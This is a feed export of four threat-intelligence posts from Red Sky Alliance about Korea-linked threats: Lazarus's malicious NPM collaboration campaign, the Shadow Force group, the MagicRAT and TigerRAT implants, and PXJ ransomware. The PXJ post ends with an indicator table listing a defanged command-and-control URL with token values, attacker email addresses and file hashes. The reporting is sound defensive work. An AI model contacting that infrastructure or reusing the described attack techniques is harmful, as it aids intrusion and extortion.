korea - X-Industry - Red Sky Alliance2024-03-28T14:51:44Zhttps://redskyalliance.org/xindustry/feed/tag/koreaWanna Collab? Download this Malwarehttps://redskyalliance.org/xindustry/wanna-collab-download-this-malware2023-07-31T20:09:24.000Z2023-07-31T20:09:24.000ZJD Thomasonhttps://redskyalliance.org/members/JDThomason<div><p><a href="{{#staticFileLink}}12167935268,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12167935268,RESIZE_400x{{/staticFileLink}}" width="250" alt="12167935268?profile=RESIZE_400x" /></a>The Lazarus Group is North Korean state sponsored cybercrime group and they have been credited, in one way or another, with a recent social engineering campaign targeting developers on GitHub. They are said to have been created by the North Korean government as early as 2007 and they are a part of the RGB, which is North Korea’s primary foreign intelligence agency. “Lazarus Group” would appear to be the primary identity of the group, but they do have several aliases such as Appleworm, Group 77, Guardians of Peace, Hidden Cobra, Jade Sleet, among several others.</p>
<p>They target institutions in many areas, such as government, military, finance, manufacturing, publishing, among many others. Their typical tactics include cyber espionage, data theft, heists, destructive malware, and as we’ll see shortly, social engineering. They have been involved in a variety of malicious activities, such as the WannaCry 2.0 ransomware, which affected approximately 300,000 computers in at least 150 different countries, the 2014 attacks on Sony Pictures, and the theft of $81 million dollars from Bangladesh Bank in 2016.</p>
<p>The social engineering campaign we’re focusing on here is like another Lazarus campaign that took place in January of 2021, where cybersecurity researchers were targeted for collaborations on vulnerability exploit research and took advantage of malicious Visual Studio projects. Social engineering can be thought of as the process of manipulating, influencing, or deceiving someone to obtain something like private information, restricted access, or valuables. As they will generally require some form of communication between attacker and victim, social engineering attacks are built around how people typically think and behave. </p>
<p>The goals of social engineering attacks will typically be either sabotage or theft. Common types of social engineering attacks found in the digital world can include things like phishing, baiting, physical breaches like tailgating, or scareware like a malicious antivirus ad giving a false report.</p>
<p>The attack cycle of a social engineering attack will generally have four stages. First is preparation where information is gathered on an individual target or a target group. Next is infiltration, which is where communication is started and trust is built, Exploitation occurs when the target’s weaknesses and trust align in such a way that allows for an advancement of the attack. Then, the attacker will disengage once all of the required actions have been taken by the target.</p>
<p>GitHub released a security alert detailing the specifics of this campaign and its attack chain on July 18th. The threat actors begin by impersonating either developers or recruiters by utilizing accounts on GitHub and other social media sites. In some cases, the accounts were fake and in other cases the accounts were compromised. Fake accounts linked to this campaign have been found on LinkedIn, Slack, and Telegram</p>
<p>Developers are being targeted in blockchain, cryptocurrency, online gambling, and cyber security. After contact has been established, targets are invited into collaboration projects, which contain malicious NPM package dependencies. These packages act as first-stage downloaders, which download and execute secondary malware. The projects themselves seem to mostly involve either media players or cryptocurrency trading tools.</p>
<p>The first instances of the NPM usage pattern exhibited by this campaign were first discovered by Phylum research in June of 2023. They noted the sophistication of the technique as the execution order of the packages used is crucial to the success of the infection. The attack is spread across of pair of ordered NPM packages. The first package will fetch and store a token from a remote server, which is then used by a second package to obtain malicious code from a remote server.</p>
<p>In terms of mitigation, we can begin by noting that GitHub has listed a few indicators like domain names, malicious NPM packages, and malicious NPM accounts on their blog. The link to the mitigation blog post is here:</p>
<p><a href="https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/">https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/</a></p>
<p>Anyone who was solicited by known malicious accounts are likely a target of this campaign. Repository invites can be reviewed in the GitHub security log. The events to look for are action:repo.add_member events, which indicate that you have accepted an invite to a repository. Think twice before accepting solicitations to collaborate on or install projects with NPM dependencies. Extra scrutiny should be given to new or recently published NPM dependencies or scripts that make network connections during installation. Anyone affected by these projects should inform their employers cybersecurity department, and it may also be prudent to reset or wipe affected devices, change account passwords, and rotate tokens stored on the affected devices.</p>
<p>In summary, the Lazarus Group is a North Korean state sponsored cyber crime group said to have been operating as early as 2007. They have several aliases like Jade Sleet and Guardians of Peace, and they operate in many areas like government, military, finance, among others.</p>
<p>Social engineering attacks aim to deceive someone in such a way that an attacker can obtain things like information or restricted access. Attacks like phishing or baiting are under the umbrella of social engineering, and a social engineering attack’s cycle will normally have four stages: preparation, infiltration, exploitation, and disengagement.</p>
<p>Developers on GitHub have been targeted in several different areas including blockchain, cryptocurrency, online gambling, and cyber security, for the purposes of collaborating on projects like media players or cryptocurrency trading tools. These can contain malicious NPM package dependencies, which act as first stage downloaders for additional malware.</p>
<p>Finally, we covered a few mitigation tips for this attack that were distributed by GitHub. They have a list of known malicious accounts listed on their blog, and anyone who has collaborated with these accounts is likely a target. Users can review their security logs on GitHub to see if they have been added to any suspicious projects. Users should also take extra care when examining the package dependencies and installation scripts of a project, particularly if newer NPM packages are involved.</p>
<p> </p>
<p><span style="font-size:8pt;">[1]: <a href="https://www.bleepingcomputer.com/news/security/github-warns-of-lazarus-hackers-targeting-devs-with-malicious-projects/">https://www.bleepingcomputer.com/news/security/github-warns-of-lazarus-hackers-targeting-devs-with-malicious-projects/</a></span></p>
<p><span style="font-size:8pt;">[2]: <a href="https://home.treasury.gov/news/press-releases/sm774">https://home.treasury.gov/news/press-releases/sm774</a></span></p>
<p><span style="font-size:8pt;">[3]: <a href="https://ofac.treasury.gov/recent-actions/20190913">https://ofac.treasury.gov/recent-actions/20190913</a></span></p>
<p><span style="font-size:8pt;">[4]: <a href="https://www.justice.gov/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and">https://www.justice.gov/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and</a></span></p>
<p><span style="font-size:8pt;">[5]: <a href="https://usa.kaspersky.com/resource-center/definitions/what-is-social-engineering">https://usa.kaspersky.com/resource-center/definitions/what-is-social-engineering</a></span></p>
<p><span style="font-size:8pt;">[6]: <a href="https://www.cmu.edu/iso/aware/dont-take-the-bait/social-engineering.html">https://www.cmu.edu/iso/aware/dont-take-the-bait/social-engineering.html</a></span></p>
<p><span style="font-size:8pt;">[7]: <a href="https://www.imperva.com/learn/application-security/social-engineering-attack/">https://www.imperva.com/learn/application-security/social-engineering-attack/</a></span></p>
<p><span style="font-size:8pt;">[8]: <a href="https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/#domains">https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/#domains</a></span></p>
<p><span style="font-size:8pt;">[9]: <a href="https://blog.phylum.io/sophisticated-ongoing-attack-discovered-on-npm/">https://blog.phylum.io/sophisticated-ongoing-attack-discovered-on-npm/</a></span></p>
<p> </p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a> </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/ </li>
<li>Website: https://www. wapacklabs. com/ </li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a> </p></div>Shadow Forcehttps://redskyalliance.org/xindustry/shadow-force2023-06-03T13:20:00.000Z2023-06-03T13:20:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}11244328498,RESIZE_710x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}11244328498,RESIZE_400x{{/staticFileLink}}" alt="11244328498?profile=RESIZE_400x" width="250" /></a>The Shadow Force group is a threat group that has been active since 2013, targeting corporations and organizations in South Korea. Trend Micro revealed the first analysis report in September 2015, where it stated that a Korean media-related company had been attacked. In March 2020, AhnLab published an analysis report on Operation Shadow Force. It was introduced as a single campaign a there was the possibility of it being activies of an existing threat group. However, no relevant threat group information has been found for over three (3) years since the release of the analysis report, and it thus seems to be a group active in Korea. In July 2022, KRCert published the details of their analysis of the Shadow Group’s additional breach through their report <u>Analysis of Lateral Movement Strategies Unsinf TTPs#7 SMB Admin Share</u>. In October 2022, AhnLab announced that the PE-modifying iatinfect.exe file is continuously being detected. </p>
<p>The report covers the changes made to the existing malware and new malware discovered through tracking recent activities of the Shadow Force group. There are continued reports of file modification using latinfect.exe, while the usage rate of the backdoor used in the past has decreased. Instead, there have been cases where other backdoors such as Viticdoor were used, and since since December 2021, cryptocurrency miners were being installed along side them. The threat actor has been using the same file name and similar malware and tools since 2014, making it easier to identify them.</p>
<p>Link to full AnhLab report on Shadow Force: <a href="{{#staticFileLink}}11244366094,original{{/staticFileLink}}">ATIP_2023_Shadow-Force-Groups-Viticdoor-and-CoinMiner.pdf</a></p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p></div>Lazarus Hackers Have New RATshttps://redskyalliance.org/xindustry/lazarus-hackers-have-new-rats2022-09-08T17:10:00.000Z2022-09-08T17:10:00.000ZJim McKeehttps://redskyalliance.org/members/JimMcKee<div><p><a href="{{#staticFileLink}}10807583873,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10807583873,RESIZE_400x{{/staticFileLink}}" alt="10807583873?profile=RESIZE_400x" width="250" /></a>A malicious campaign mounted by the North Korea-linked Lazarus Group targets energy providers worldwide, including those based in the United States, Canada, and Japan.</p>
<p>The campaign is meant to infiltrate organizations worldwide to establish long-term access and subsequently exfiltrate data of interest to the adversary's nation-state, according to investigators. Some elements of the espionage attacks have already been reported in the media.</p>
<p>See: <a href="https://redskyalliance.org/xindustry/lazarus-group-is-back-with-more-malware">https://redskyalliance.org/xindustry/lazarus-group-is-back-with-more-malware</a></p>
<p>Symantec attributed the operation to a group referred to as Stonefly, a Lazarus subgroup better known as Andariel, Guardian of Peace, OperationTroy, and Silent Chollima. While these attacks previously led to the instrumentation of Preft (aka Dtrack) and NukeSped (aka Manuscript) implants, the latest attack wave is notable for employing two other pieces of malware: VSingle, an HTTP bot that executes arbitrary code from a remote network, and a Golang backdoor called YamaBot. Also used in the campaign is a new remote access trojan called MagicRAT with capabilities to evade detection and launch additional payloads on the infected systems. Although the same tactics have been applied in both attacks, the resulting malware implants deployed have been distinct from one another, indicating the wide variety of implants available at the disposal of Lazarus, according to researchers.<a href="#_ftn1">[1]</a></p>
<p>A C++-based implant, MagicRAT is designed to achieve persistence by creating scheduled tasks on the compromised system. It is also “rather simple” in that it provides the attacker with a remote shell to execute arbitrary commands and carry out file operations. MagicRAT can also launch additional payloads retrieved from a remote server on infected hosts. One of the executables retrieved from the command-and-control (C2) server takes the form of a GIF image file but in reality, is a lightweight port scanner. The C2 infrastructure associated with MagicRAT has been found harboring and serving newer versions of TigerRAT, a backdoor formerly attributed to Andariel, and is engineered to execute commands, take screenshots, log keystrokes, and harvest system information.</p>
<p>Also included in the latest variant is a USB Dump feature that allows the adversary to hunt for files with specific extensions, alongside laying the groundwork for implementing video capture from webcams. The discovery of MagicRAT in the wild indicates Lazarus’ motivations to rapidly build new, bespoke malware to use along with their previously known malware such as TigerRAT to target organizations worldwide,” the researchers said.</p>
<p>Initial access into enterprise networks is facilitated using exploitation of vulnerabilities in VMware products (e.g., Log4Shell), with the ultimate goal of establishing persistent access to activities supporting North Korean government objectives. The use of VSingle in one attack chain is said to have enabled the threat actor to carry out various activities such as reconnaissance, exfiltration, and manual back-dooring, giving the operators a solid understanding of the victim environment.</p>
<p>Other tactics embraced by the group besides the use of such malware include credential harvesting via tools like Mimikatz and Procdump, disabling antivirus components, reconnaissance of the Active Directory services, and even taking steps to clean up their traces after activating the back-doors on the endpoint.</p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments, or assistance, please contact the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs. com</a> </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www. redskyalliance. org/</a></li>
<li>Website: <a href="https://www.wapacklabs.com/">https://www. wapacklabs. com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www. linkedin. com/company/64265941</a> </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p> </p>
<p><a href="#_ftnref1">[1]</a> <a href="https://thehackernews.com/2022/09/north-korean-lazarus-hackers-targeting.html">https://thehackernews.com/2022/09/north-korean-lazarus-hackers-targeting.html</a></p></div>PXJ Ransomware Targeted Asia, Francehttps://redskyalliance.org/xindustry/pxj-ransomware-targeted-asia-france2020-03-19T14:25:25.000Z2020-03-19T14:25:25.000ZYury Polozovhttps://redskyalliance.org/members/YuryPolozov<div><p><a href="{{#staticFileLink}}4157799936,RESIZE_710x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}4157799936,RESIZE_710x{{/staticFileLink}}" alt="4157799936?profile=RESIZE_710x" width="278" height="302" /></a>A new ransomware strain called PXJ ransomware (also known as XVFXGW ransomware) was first discovered in late February 2020.<a>[1]</a> Half of the known samples were uploaded from Korea, and it uses a Korean website for a C2, showing predominantly Asian targeting.</p>
<p><strong>Details</strong></p>
<p>The earliest PXJ ransomware sample is from 24 February 2020. It received its name for the .pxj extension that it adds to the files it encrypts. Its alternative name, XVFXGW, refers to the strings in two contact emails (xvfxgw3929@protonmail.com, xvfxgw213@decoymail.com) and in the mutex that it creates (See the Indicators table below).</p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p>Prior to encryption, PXJ empties the Recycle Bin, deletes volume shadow copies and disables the Windows Error Recovery service. Then PXJ uses both AES and RSA algorithms to lock data down.<a>[2]</a></p>
<p><a href="{{#staticFileLink}}4157591959,RESIZE_1200x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}4157863642,RESIZE_710x{{/staticFileLink}}" width="710" alt="4157863642?profile=RESIZE_710x" /></a></p>
<p>Figure 1. PXJ ransom note stored in LOOK.txt <a>[3]</a></p>
<p> </p>
<p>Red Sky Alliance detected C2 communication with a Korean site (pediitn[.]co[.]kr) co-hosted on a Korean IP. Hackers likely temporarily compromised this domain, belonging to a Korean pedicure company, and secretly hosted a malicious .php page within the site. </p>
<p>Half of the samples were submitted from Korea, as well as one from China, and one from France. Red Sky Alliance will continue to monitor if PXJ ransomware will become a larger threat.</p>
<p><strong>Indicators</strong></p>
<table width="624">
<tbody>
<tr>
<td width="229">
<p>Indicator</p>
</td>
<td width="52">
<p>Type</p>
</td>
<td width="66">
<p>Kill_Chain_Phase</p>
</td>
<td width="66">
<p>First_Seen</p>
</td>
<td width="66">
<p>Last_Seen</p>
</td>
<td width="72">
<p>Comments</p>
</td>
<td width="74">
<p>Attribution</p>
</td>
</tr>
<tr>
<td width="229">
<p>http[://]pediitn[.]co[.]kr/bbs/do.php?token_value=syajidiwmjavmy8xnca5ojq3ojmxiakgqu5btfltvdatmkqxnjcxiakgqufbqkfosxg5m1jkdwzpna==</p>
</td>
<td width="52">
<p>URL</p>
</td>
<td width="66">
<p>C2</p>
</td>
<td width="66">
<p>02/29/2020</p>
</td>
<td width="66">
<p>03/17/2020</p>
</td>
<td width="72">
<p> </p>
</td>
<td width="74">
<p>PXJ Ransomware</p>
</td>
</tr>
<tr>
<td width="229">
<p>SyAJIDIwMjAvMy8xIDM6NTg6NTggCSBpY2Z3cmhpIAkgQUFBQkFOSXg5M1JkdWZPNA</p>
</td>
<td width="52">
<p>String</p>
</td>
<td width="66">
<p>C2</p>
</td>
<td width="66">
<p>02/29/2020</p>
</td>
<td width="66">
<p>02/29/2020</p>
</td>
<td width="72">
<p>Token_value</p>
</td>
<td width="74">
<p>PXJ Ransomware</p>
</td>
</tr>
<tr>
<td width="229">
<p>syajidiwmjavmy8xidm6ntk6mzggcsbbtkfmwvnumc0yrde2nzegcsbbqufcqu5jedkzumr1zk80</p>
</td>
<td width="52">
<p>String</p>
</td>
<td width="66">
<p>C2</p>
</td>
<td width="66">
<p>03/01/2020</p>
</td>
<td width="66">
<p>03/01/2020</p>
</td>
<td width="72">
<p>Token_value</p>
</td>
<td width="74">
<p>PXJ Ransomware</p>
</td>
</tr>
<tr>
<td width="229">
<p>XVFXGW DOUBLE SET</p>
</td>
<td width="52">
<p>String</p>
</td>
<td width="66">
<p>Exploitation</p>
</td>
<td width="66">
<p>02/29/2020</p>
</td>
<td width="66">
<p>03/17/2020</p>
</td>
<td width="72">
<p>Mutexes Created</p>
</td>
<td width="74">
<p>PXJ Ransomware</p>
</td>
</tr>
<tr>
<td width="229">
<p>64fdcb90411440bc44970d1ecce60686b85df54ed552abf312947207ea654dce</p>
</td>
<td width="52">
<p>SHA256</p>
</td>
<td width="66">
<p>Delivery</p>
</td>
<td width="66">
<p>02/29/2020</p>
</td>
<td width="66">
<p>02/29/2020</p>
</td>
<td width="72">
<p> </p>
</td>
<td width="74">
<p>PXJ Ransomware</p>
</td>
</tr>
<tr>
<td width="229">
<p>c5697c0166f9b18ee157bcdde9fb2f531892d62076b4fa3664adf0065598ebf7</p>
</td>
<td width="52">
<p>SHA256</p>
</td>
<td width="66">
<p>Delivery</p>
</td>
<td width="66">
<p>02/29/2020</p>
</td>
<td width="66">
<p>02/29/2020</p>
</td>
<td width="72">
<p> </p>
</td>
<td width="74">
<p>PXJ Ransomware</p>
</td>
</tr>
<tr>
<td width="229">
<p>9a4e4211f7e690ee4a520c491ef7766dcf1cc9859afa991e15538e92b435f3a1</p>
</td>
<td width="52">
<p>SHA256</p>
</td>
<td width="66">
<p>Delivery</p>
</td>
<td width="66">
<p>02/24/2020</p>
</td>
<td width="66">
<p>02/24/2020</p>
</td>
<td width="72">
<p> </p>
</td>
<td width="74">
<p>PXJ Ransomware</p>
</td>
</tr>
<tr>
<td width="229">
<p>58673f5c9344f510703ffda908c7e7830f36905015529ab629479c6bf44236e9</p>
</td>
<td width="52">
<p>SHA256</p>
</td>
<td width="66">
<p>NA</p>
</td>
<td width="66">
<p>02/25/2020</p>
</td>
<td width="66">
<p>02/29/2020</p>
</td>
<td width="72">
<p> </p>
</td>
<td width="74">
<p>PXJ Ransomware</p>
</td>
</tr>
<tr>
<td width="229">
<p>xvfxgw3929@protonmail.com</p>
</td>
<td width="52">
<p>Email</p>
</td>
<td width="66">
<p>Actions and Objectives</p>
</td>
<td width="66">
<p>03/19/2019</p>
</td>
<td width="66">
<p>03/19/2019</p>
</td>
<td width="72">
<p> </p>
</td>
<td width="74">
<p>PXJ Ransomware</p>
</td>
</tr>
<tr>
<td width="229">
<p>xvfxgw213@decoymail.com</p>
</td>
<td width="52">
<p>Email</p>
</td>
<td width="66">
<p>Actions and Objectives</p>
</td>
<td width="66">
<p>03/19/2019</p>
</td>
<td width="66">
<p>03/19/2019</p>
</td>
<td width="72">
<p> </p>
</td>
<td width="74">
<p>PXJ Ransomware</p>
</td>
</tr>
</tbody>
</table>
<p> </p>
<p>Red Sky Alliance partners with Cysurance to protect you from the PXJ ransomware and other cyber risks by supplementing security technology with robust cyber insurance.</p>
<p>Red Sky Alliance is in New Boston, NH. We are a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the lab directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a></p>
<p>Serial: IR-20-078-001</p>
<p>Country: KR, CN, FR</p>
<p>Report Date: 20200318</p>
<p>Industries: All</p>
<p><a>[1]</a> Primary analysis from IBM X-Force IRIS</p>
<p><a>[2] </a>securityintelligence.com/posts/pxj-ransomware-campaign-identified-by-x-force-iris/</p>
<p><a>[3]</a> twitter.com/Amigo_A_/status/1232221881002057728</p></div>